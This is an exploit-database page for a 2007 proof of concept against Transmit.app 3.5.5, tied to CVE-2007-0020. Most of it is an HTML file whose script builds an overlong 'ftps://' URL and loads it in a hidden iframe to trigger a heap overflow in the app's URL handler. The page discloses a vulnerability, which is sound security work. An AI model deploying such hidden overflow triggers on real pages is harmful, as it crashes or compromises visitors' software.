Lucene search
+L

Transmit.app 3.5.5 - 'ftps://' URL Handler Heap Buffer Overflow (PoC)

🗓️ 20 Jan 2007 00:00:00Reported by MoABType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 36 Views

Transmit.app 3.5.5 ftps URL Handler Heap Buffer Overflo

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2007-0020
24 Jan 200701:00
cve
Cvelist
CVE-2007-0020
24 Jan 200701:00
cvelist
EUVD
EUVD-2007-0024
24 Jan 200701:00
euvd
NVD
CVE-2007-0020
24 Jan 200701:28
nvd
Prion
Heap overflow
24 Jan 200701:28
prion
securityvulns
Apple Mac OS X transmit.app buffer overflow
21 Jan 200700:00
securityvulns
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
	"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
	<head>
		<title>MOAB-19-01-2007</title>
		<script>
			function boom() {
			    var recipient = document.getElementById('testbox');
				var str = '';
				for (var i = 0; i < 408; i++) {
				    str = str + 'A'
				}
				str = str + 'ABCD';

				alert('Payload size: ' + str.length);

				str = "ftps://" + str;
				ftarget = document.createElement('iframe');
				ftarget.src = str;
				ftarget.width = 1;
				ftarget.height = 1;
				recipient.appendChild(ftarget);
			}
		</script>
	</head>
	<body>
	    <div id="testbox" style="display: none;"></div>
		<input type="button" onclick="boom();" value="Test MOAB-19-01-2007" />

	</body>
</html>

# milw0rm.com [2007-01-20]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Jan 2007 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.07785
36